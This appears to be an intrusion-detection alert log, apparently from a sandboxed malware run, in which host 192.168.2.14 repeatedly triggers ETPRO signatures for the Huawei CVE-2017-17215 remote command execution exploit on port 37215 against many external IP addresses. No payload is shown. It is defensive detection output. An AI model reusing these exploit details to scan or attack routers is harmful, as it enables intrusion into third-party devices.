                                                    07/10/24-08:26:38.609336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5781637215192.168.2.14197.129.217.58
                                                    07/10/24-08:27:13.850530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090037215192.168.2.14136.106.68.74
                                                    07/10/24-08:26:28.819070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439637215192.168.2.14136.203.204.171
                                                    07/10/24-08:27:02.887969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596237215192.168.2.14162.63.7.115
                                                    07/10/24-08:27:32.574488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784437215192.168.2.1450.48.61.59
                                                    07/10/24-08:26:28.830687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856637215192.168.2.14197.230.186.3
                                                    07/10/24-08:27:19.273517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695837215192.168.2.14197.194.93.247
                                                    07/10/24-08:27:28.124721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659237215192.168.2.14197.205.134.123
                                                    07/10/24-08:26:14.813637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4962237215192.168.2.14197.14.180.236
                                                    07/10/24-08:27:19.148299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5430237215192.168.2.1441.9.124.250
                                                    07/10/24-08:27:32.603440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360437215192.168.2.1441.56.76.57
                                                    07/10/24-08:26:26.591446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4245037215192.168.2.1441.191.140.240
                                                    07/10/24-08:26:31.060158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039037215192.168.2.1441.224.20.247
                                                    07/10/24-08:26:45.666546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429837215192.168.2.14197.154.122.190
                                                    07/10/24-08:27:02.841622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708437215192.168.2.14197.60.203.151
                                                    07/10/24-08:27:02.857576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3573037215192.168.2.14157.57.31.31
                                                    07/10/24-08:27:19.334471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448437215192.168.2.14157.31.31.203
                                                    07/10/24-08:27:14.898018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564437215192.168.2.1441.20.189.77
                                                    07/10/24-08:27:32.622738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5072037215192.168.2.14197.225.49.39
                                                    07/10/24-08:26:20.137909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156037215192.168.2.1441.231.236.174
                                                    07/10/24-08:26:25.528044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654637215192.168.2.14204.107.152.212
                                                    07/10/24-08:27:11.519267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4266637215192.168.2.14157.85.73.162
                                                    07/10/24-08:27:23.503899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649637215192.168.2.14157.225.30.253
                                                    07/10/24-08:27:22.932335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332237215192.168.2.1458.22.69.27
                                                    07/10/24-08:27:23.853234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201637215192.168.2.14197.124.5.252
                                                    07/10/24-08:27:23.887861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471237215192.168.2.1441.57.131.187
                                                    07/10/24-08:27:22.839204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407837215192.168.2.14197.108.121.37
                                                    07/10/24-08:26:45.647337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293437215192.168.2.14169.193.154.177
                                                    07/10/24-08:27:28.177796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4489437215192.168.2.1413.229.16.214
                                                    07/10/24-08:26:29.813463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5593437215192.168.2.14157.59.165.226
                                                    07/10/24-08:26:55.350146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5299637215192.168.2.14197.232.90.96
                                                    07/10/24-08:26:23.293850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709037215192.168.2.1441.229.94.141
                                                    07/10/24-08:26:28.874415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547037215192.168.2.1441.74.176.197
                                                    07/10/24-08:26:55.277913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3518237215192.168.2.14167.248.125.181
                                                    07/10/24-08:27:33.915892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598237215192.168.2.14197.228.122.137
                                                    07/10/24-08:26:14.798571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5686237215192.168.2.14197.124.185.91
                                                    07/10/24-08:27:05.226106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495037215192.168.2.1441.46.135.43
                                                    07/10/24-08:26:48.005351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507237215192.168.2.1439.21.174.199
                                                    07/10/24-08:26:52.029476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077837215192.168.2.14197.15.116.45
                                                    07/10/24-08:26:43.688835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944437215192.168.2.1441.40.57.239
                                                    07/10/24-08:27:07.380446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5996837215192.168.2.14200.251.142.167
                                                    07/10/24-08:26:34.264722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4466437215192.168.2.1441.96.214.244
                                                    07/10/24-08:27:19.317209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3903037215192.168.2.1445.194.219.199
                                                    07/10/24-08:26:28.877941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114037215192.168.2.14203.243.169.147
                                                    07/10/24-08:26:41.394588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5265437215192.168.2.1441.58.189.186
                                                    07/10/24-08:26:45.630822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3588637215192.168.2.14197.50.19.57
                                                    07/10/24-08:26:36.416571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4575637215192.168.2.14209.250.204.124
                                                    07/10/24-08:27:22.535302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480237215192.168.2.1441.66.159.162
                                                    07/10/24-08:26:22.273288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429637215192.168.2.14157.50.129.137
                                                    07/10/24-08:26:43.550516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532237215192.168.2.14206.185.235.225
                                                    07/10/24-08:26:52.052711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950837215192.168.2.14157.89.128.128
                                                    07/10/24-08:26:42.415895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376437215192.168.2.1441.245.237.165
                                                    07/10/24-08:26:47.890568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3549837215192.168.2.14197.46.162.26
                                                    07/10/24-08:27:10.605752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667237215192.168.2.14157.157.105.218
                                                    07/10/24-08:26:28.637197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5873637215192.168.2.14157.222.168.247
                                                    07/10/24-08:27:14.839974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014237215192.168.2.14178.94.38.118
                                                    07/10/24-08:26:41.568062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5831237215192.168.2.1441.192.167.65
                                                    07/10/24-08:27:34.131322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4480037215192.168.2.14197.218.155.36
                                                    07/10/24-08:26:49.810564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812637215192.168.2.14108.170.53.50
                                                    07/10/24-08:27:19.246570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491837215192.168.2.14157.158.105.105
                                                    07/10/24-08:27:03.020823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366637215192.168.2.14197.188.200.138
                                                    07/10/24-08:26:42.342192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482037215192.168.2.1424.124.1.53
                                                    07/10/24-08:26:55.410350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5268437215192.168.2.14157.85.54.251
                                                    07/10/24-08:27:10.556595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4129637215192.168.2.14157.234.148.63
                                                    07/10/24-08:26:28.850174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4236637215192.168.2.1441.68.81.0
                                                    07/10/24-08:26:52.028986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4712037215192.168.2.14101.23.133.123
                                                    07/10/24-08:26:11.144778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4057637215192.168.2.1441.189.126.251
                                                    07/10/24-08:26:14.809030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979237215192.168.2.14197.28.220.45
                                                    07/10/24-08:26:15.799288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246837215192.168.2.1441.153.250.244
                                                    07/10/24-08:26:43.842656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4570237215192.168.2.1472.165.73.60
                                                    07/10/24-08:27:22.910234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414037215192.168.2.14191.62.9.238
                                                    07/10/24-08:27:08.432094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131637215192.168.2.14197.84.108.92
                                                    07/10/24-08:26:42.418339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5944237215192.168.2.14108.207.208.113
                                                    07/10/24-08:26:49.901812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485437215192.168.2.1441.112.123.162
                                                    07/10/24-08:26:42.164122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747237215192.168.2.14157.53.221.75
                                                    07/10/24-08:26:20.177629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352437215192.168.2.1460.91.153.152
                                                    07/10/24-08:26:41.343465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571637215192.168.2.14196.210.142.217
                                                    07/10/24-08:27:10.751159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304637215192.168.2.14197.230.64.158
                                                    07/10/24-08:26:17.949635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946237215192.168.2.14197.134.200.55
                                                    07/10/24-08:26:36.360121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165837215192.168.2.14197.184.139.102
                                                    07/10/24-08:26:15.876739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697837215192.168.2.14157.48.246.75
                                                    07/10/24-08:27:08.292771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3908637215192.168.2.1441.242.97.165
                                                    07/10/24-08:27:23.937541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448037215192.168.2.14221.180.237.192
                                                    07/10/24-08:26:43.626200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204837215192.168.2.1441.3.72.81
                                                    07/10/24-08:26:22.224189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3770237215192.168.2.14197.253.187.73
                                                    07/10/24-08:26:59.643122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079837215192.168.2.14157.37.186.131
                                                    07/10/24-08:26:59.881889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282637215192.168.2.14197.105.249.163
                                                    07/10/24-08:26:41.569815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860237215192.168.2.14173.147.37.204
                                                    07/10/24-08:27:32.588924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848837215192.168.2.14197.78.94.91
                                                    07/10/24-08:26:17.972385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5960237215192.168.2.1461.144.149.243
                                                    07/10/24-08:27:34.124417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5078037215192.168.2.14197.151.234.92
                                                    07/10/24-08:27:10.583365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803437215192.168.2.14157.203.110.221
                                                    07/10/24-08:27:05.191849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193437215192.168.2.14197.232.117.225
                                                    07/10/24-08:27:27.159705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809437215192.168.2.14197.86.163.130
                                                    07/10/24-08:26:11.606817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3908237215192.168.2.14157.53.146.11
                                                    07/10/24-08:26:51.987435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3640237215192.168.2.14126.74.88.7
                                                    07/10/24-08:27:22.913533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5633437215192.168.2.1441.0.173.219
                                                    07/10/24-08:27:14.861603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398037215192.168.2.1447.90.25.215
                                                    07/10/24-08:26:23.356000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711837215192.168.2.14197.19.223.167
                                                    07/10/24-08:26:59.843176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838437215192.168.2.14197.145.46.135
                                                    07/10/24-08:26:47.840922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396837215192.168.2.1412.91.224.169
                                                    07/10/24-08:26:28.916413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4662037215192.168.2.1481.1.222.242
                                                    07/10/24-08:27:33.925004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4735837215192.168.2.14157.161.236.31
                                                    07/10/24-08:26:29.808403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880237215192.168.2.14157.176.189.199
                                                    07/10/24-08:27:10.561915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877837215192.168.2.14128.55.253.22
                                                    07/10/24-08:26:13.666761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222837215192.168.2.14157.109.246.76
                                                    07/10/24-08:26:29.861363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317837215192.168.2.1488.236.223.243
                                                    07/10/24-08:26:28.840131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697437215192.168.2.14200.65.12.234
                                                    07/10/24-08:27:02.876931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5586237215192.168.2.14154.126.213.127
                                                    07/10/24-08:27:20.387304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896837215192.168.2.14210.214.209.12
                                                    07/10/24-08:27:22.849786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901037215192.168.2.14197.73.42.204
                                                    07/10/24-08:26:17.992846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346037215192.168.2.1441.18.169.34
                                                    07/10/24-08:27:02.726591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966837215192.168.2.14110.103.13.198
                                                    07/10/24-08:26:11.133869TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5673637215192.168.2.14197.132.201.193
                                                    07/10/24-08:27:11.480089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871437215192.168.2.14197.88.107.185
                                                    07/10/24-08:27:27.084495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5490437215192.168.2.14197.11.86.58
                                                    07/10/24-08:26:11.165821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684637215192.168.2.14157.102.180.139
                                                    07/10/24-08:27:22.926314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4076637215192.168.2.1441.220.49.125
                                                    07/10/24-08:26:43.656614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3822237215192.168.2.14197.139.30.181
                                                    07/10/24-08:27:30.545208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709637215192.168.2.14157.154.130.190
                                                    07/10/24-08:26:26.513484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794837215192.168.2.14157.192.155.103
                                                    07/10/24-08:26:31.086476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4406037215192.168.2.1441.190.93.133
                                                    07/10/24-08:27:13.761850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3672437215192.168.2.14197.14.88.192
                                                    07/10/24-08:27:23.930240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543637215192.168.2.1488.20.81.28
                                                    07/10/24-08:27:02.857366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737637215192.168.2.1441.20.198.43
                                                    07/10/24-08:27:28.155678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042837215192.168.2.14197.177.14.229
                                                    07/10/24-08:26:33.156577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3824637215192.168.2.14197.160.238.49
                                                    07/10/24-08:26:43.872058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758837215192.168.2.14112.239.72.238
                                                    07/10/24-08:26:31.095696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4406837215192.168.2.1441.134.89.40
                                                    07/10/24-08:26:34.216677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800637215192.168.2.14124.33.4.121
                                                    07/10/24-08:27:13.915604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070037215192.168.2.1441.28.6.161
                                                    07/10/24-08:27:19.315595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377237215192.168.2.1441.189.51.31
                                                    07/10/24-08:26:17.978087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080437215192.168.2.1441.184.251.250
                                                    07/10/24-08:27:08.435352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676837215192.168.2.1441.248.243.90
                                                    07/10/24-08:27:02.860039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556837215192.168.2.1441.130.119.87
                                                    07/10/24-08:26:38.536565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927037215192.168.2.14157.27.205.235
                                                    07/10/24-08:26:42.461538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4372837215192.168.2.14197.22.89.233
                                                    07/10/24-08:27:24.872806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644237215192.168.2.14197.143.81.215
                                                    07/10/24-08:26:13.851676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4168237215192.168.2.1441.116.87.18
                                                    07/10/24-08:26:23.340651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956437215192.168.2.14197.198.205.215
                                                    07/10/24-08:26:25.505039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5776237215192.168.2.1441.235.168.88
                                                    07/10/24-08:27:28.055753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608437215192.168.2.1441.213.217.44
                                                    07/10/24-08:26:26.554327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414237215192.168.2.14197.91.178.144
                                                    07/10/24-08:27:23.949605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4436837215192.168.2.14157.214.166.202
                                                    07/10/24-08:26:20.178159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535637215192.168.2.14157.133.19.146
                                                    07/10/24-08:26:43.607269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439837215192.168.2.14211.114.28.252
                                                    07/10/24-08:27:02.991473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394837215192.168.2.14197.155.103.115
                                                    07/10/24-08:26:25.490164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598237215192.168.2.1441.88.197.120
                                                    07/10/24-08:26:43.857125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5133837215192.168.2.14157.252.58.236
                                                    07/10/24-08:27:02.702658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6055237215192.168.2.14157.160.251.34
                                                    07/10/24-08:27:30.483664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025237215192.168.2.14197.211.65.49
                                                    07/10/24-08:26:47.918271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543037215192.168.2.14107.64.60.36
                                                    07/10/24-08:27:13.988913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166237215192.168.2.14157.255.39.138
                                                    07/10/24-08:26:59.878182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253637215192.168.2.1485.178.101.145
                                                    07/10/24-08:26:57.659846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738237215192.168.2.14197.136.110.95
                                                    07/10/24-08:27:02.975587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512837215192.168.2.14197.237.186.209
                                                    07/10/24-08:26:25.479051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4196437215192.168.2.14157.174.35.203
                                                    07/10/24-08:26:57.560013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412437215192.168.2.14134.237.232.0
                                                    07/10/24-08:27:20.470847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188237215192.168.2.1441.179.79.226
                                                    07/10/24-08:26:14.622082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028837215192.168.2.14189.9.50.106
                                                    07/10/24-08:26:43.667118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563237215192.168.2.14157.98.14.193
                                                    07/10/24-08:26:28.912225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486637215192.168.2.1497.161.45.53
                                                    07/10/24-08:27:14.863402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4605437215192.168.2.14197.238.4.11
                                                    07/10/24-08:26:14.822211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517837215192.168.2.1441.55.167.156
                                                    07/10/24-08:26:57.677011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5731037215192.168.2.14157.187.235.208
                                                    07/10/24-08:27:03.019340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698037215192.168.2.1441.211.196.90
                                                    07/10/24-08:26:31.086476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264837215192.168.2.14157.224.69.162
                                                    07/10/24-08:26:53.207305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247637215192.168.2.1441.67.20.56
                                                    07/10/24-08:26:11.500139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141437215192.168.2.14157.26.3.225
                                                    07/10/24-08:27:19.324421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529037215192.168.2.14157.151.127.120
                                                    07/10/24-08:26:25.446439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681237215192.168.2.14178.71.160.165
                                                    07/10/24-08:27:20.425119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332437215192.168.2.1441.98.212.117
                                                    07/10/24-08:27:03.040762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3651037215192.168.2.14157.89.171.6
                                                    07/10/24-08:26:28.923513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786437215192.168.2.1441.113.86.186
                                                    07/10/24-08:26:41.599892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6085037215192.168.2.1480.122.229.255
                                                    07/10/24-08:27:02.906092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4456837215192.168.2.14218.193.145.233
                                                    07/10/24-08:27:13.752380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4858637215192.168.2.1441.31.202.206
                                                    07/10/24-08:27:23.962795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252037215192.168.2.1441.98.224.211
                                                    07/10/24-08:27:17.102138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4151037215192.168.2.14197.70.164.141
                                                    07/10/24-08:26:49.846207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5363637215192.168.2.14157.141.117.254
                                                    07/10/24-08:26:47.912499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265437215192.168.2.14151.54.114.255
                                                    07/10/24-08:26:57.536495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890637215192.168.2.14197.231.173.207
                                                    07/10/24-08:27:10.674109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946237215192.168.2.14126.84.86.69
                                                    07/10/24-08:26:34.220908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4730837215192.168.2.14216.80.244.192
                                                    07/10/24-08:26:52.045134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028037215192.168.2.14197.110.63.34
                                                    07/10/24-08:26:43.851748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286037215192.168.2.1441.89.142.200
